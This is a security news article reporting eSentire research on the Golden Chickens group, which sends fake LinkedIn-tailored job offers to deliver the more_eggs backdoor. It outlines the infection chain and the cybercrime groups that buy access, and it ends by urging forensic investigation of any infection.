Top cybercrime gangs use targeted fake job offers to deploy stealthy backdoor

A group of criminals behind a stealthy backdoor known as more_eggs is targeting professionals with fake job offers tailored to them based on information from their LinkedIn profiles. The gang is selling access to systems infected with the backdoor to other sophisticated cybercrime groups including FIN6, Evilnum and Cobalt Group that are known to target organizations from various industries.

Spearfishing with LinkedIn info

In a recent attack detected by researchers from managed detection and response firm eSentire, the hackers targeted a professional working in the healthcare technology industry with a phishing email mimicking a job offer for a position identical to the one the target had listed on their LinkedIn profile page. This seems to be a technique that this group, known in the security industry as the Golden Chickens, has also used in the past.

The rogue emails contain a zip file that’s named after the job position the email offers. If opened, it starts a malicious component known as VenomLNK, which serves as the first stage in the more_eggs infection.

“Golden Chickens sell the backdoor under a malware-as-a-service (MaaS) arrangement to other cybercriminals,” the eSentire’s research team said in its report. “Once more_eggs is on the victim’s computer system, the Golden Eggs seedy customers can go in and infect the system with any type of malware: ransomware, credential stealers, banking malware, or simply use the backdoor as a foothold into the victim’s network so as to exfiltrate data.”

The infection chain

Once executed on a victim’s machine, VenomLNK uses Windows Management Instrumentation (WMI), a subsystem of PowerShell, to deploy that attack’s second stage: a malware loader known as TerraLoader.

TerraLoader hijacks two legitimate Windows processes, cmstp and regsvr32, to load the final payload called TerraPreter, which gets downloaded from servers hosted on Amazon AWS to evade possible network filters and gets deployed as an ActiveX control. ActiveX is a framework that allows code execution through Internet Explorer and is supported natively on Windows.

TerraLoader also drops and opens a Microsoft Word document that’s designed to look like a legitimate employment application. This is used only as a decoy so the user doesn’t become suspicious after opening the email attachment.

The TerraPreter payload signals back to the attackers’ command and control server that it has been deployed and is ready to receive commands. The attackers can then use it to gain hands-on access to the victim computer, deploy plugins or additional malware payloads.

“More_eggs maintains a stealthy profile by abusing legitimate Windows processes and feeds those process instructions via script files,” the eSentire researchers said. “Additionally, campaigns using the MaaS offering appear to be sparse and selective in comparison to typical malspam distribution networks.”

Golden Chickens’ powerful clients

The Golden Chickens seem to cater only to a select group of high-profile attackers. One of its clients is likely FIN6, a notorious financial cybercrime group that has been around since at least 2014. This group is known for targeting physical point-of-sale systems and, more recently, online payment systems to steal card data and sell it on the underground market.

FIN6 has hit organizations from the retail, hospitality and restaurant sectors over the years and was seen using the more_eggs backdoor in attacks against e-commerce companies in 2019. In a separate 2019 campaign targeting multinational companies, FIN6 used the same phishing lure relying on fake job offers to target employees.

Another threat actor known to use more_eggs is Evilnum, a group known for targeting financial technology companies and stock trading platforms since 2018. Evilnum is also a suspected mercenary group that sells hacker-for-hire services. According to eSentire, the Evilnum attackers also spear phish the employees of the companies they target with malicious zip attachments that sometimes contain the more_eggs backdoor.

A third cybercrime actor that has been reported to use more_eggs is the Cobalt Group, also known as Carbanak. This group specializes in stealing money from banks and other financial organizations and is known for its deep reconnaissance and patience — the group can spend months inside victim networks analyzing their custom applications and workflows before striking.

Given the type of groups that use more_eggs and their sophistication, an infection with this backdoor on a network should be taken very seriously and should lead to a full forensics investigation. Attackers might have already spread to critical systems and are preparing to launch a more serious attack or are exfiltrating sensitive information.